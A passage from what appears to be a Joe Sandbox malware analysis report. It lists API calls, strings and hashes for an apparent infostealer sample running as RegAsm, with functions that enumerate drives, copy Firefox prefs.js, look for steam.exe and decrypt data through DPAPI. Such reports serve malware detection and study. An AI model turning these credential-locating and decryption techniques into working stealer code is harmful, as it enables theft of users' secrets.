Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D

lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
lstrlenA.KERNEL32(?), ref: 004152C4

Strings

*%DRIVE_FIXED%*, xrefs: 0041515E
%DRIVE_REMOVABLE%, xrefs: 00415215
*%DRIVE_REMOVABLE%*, xrefs: 0041518F
%DRIVE_FIXED%, xrefs: 00415230

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 441469471-147700698
Opcode ID: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
Opcode Fuzzy Hash: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59

Function 00401D80 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 529fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindNextFileA.KERNEL32(?,?), ref: 004023A2
FindClose.KERNEL32(?), ref: 004023B6
FindNextFileA.KERNEL32(?,?), ref: 004026C6
FindClose.KERNEL32(?), ref: 004026DA

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE

Strings

\*.*, xrefs: 00401E9E

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Find$lstrcpy$Close$CreateFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 1116797323-1173974218
Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99

Function 0040D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

CopyFileA.KERNEL32(?,?,00000001,0043758C,004368AF), ref: 0040D7E8
DeleteFileA.KERNEL32(?), ref: 0040D8B3
FindNextFileA.KERNELBASE(?,?), ref: 0040D956
FindClose.KERNEL32(?), ref: 0040D96A

Strings

prefs.js, xrefs: 0040D702

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
String ID: prefs.js
API String ID: 893096357-3783873740
Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99

Function 0040B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
StrCmpCA.SHLWAPI(?), ref: 0040B780

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A

FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
FindClose.KERNEL32(?), ref: 0040B8FF

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
String ID:
API String ID: 3801961486-0
Opcode ID: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
Instruction ID: de252c0fab1b0e9a2d3383b13184952b75e93cbc882370f7403094166be9312a
Opcode Fuzzy Hash: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
Instruction Fuzzy Hash: 7E812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9

Function 004124A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 004124B2
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
Process32First.KERNEL32(00000000,00000128), ref: 004124E4
Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
CloseHandle.KERNEL32(00000000), ref: 00412521

Strings

steam.exe, xrefs: 004124B7, 00412500

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID: steam.exe
API String ID: 1799959500-2826358650
Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15

Function 00410DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

LocalFree.KERNEL32(00000000), ref: 00410EFF

Strings

/ , xrefs: 00410E73

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54

Function 0041257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00412589
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
StrCmpCA.SHLWAPI(?), ref: 004125DC
CloseHandle.KERNEL32(00000000), ref: 004125F0

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID:
API String ID: 1799959500-0
Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25

Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

DPAPI, xrefs: 004080A9

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID: DPAPI
API String ID: 2068576380-1690256801
Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90

Function 004114A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Process32Next.KERNEL32(00000000,00000128), ref: 00411542
CloseHandle.KERNEL32(00000000), ref: 0041154D

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 907984538-0
Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69

Function 00410D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
HeapAlloc.KERNEL32(00000000), ref: 00410D50
GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
wsprintfA.USER32 ref: 00410D7D

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
Instruction ID: 3462f644bc87497e0213169472e2bde5c7d2207eb6d596ae75af8f0473202e49
Opcode Fuzzy Hash: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
Instruction Fuzzy Hash: 78F0E070A0132467EB04DFB4EC49B9B37659B04729F100295F511D71D0EB759E848785

Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
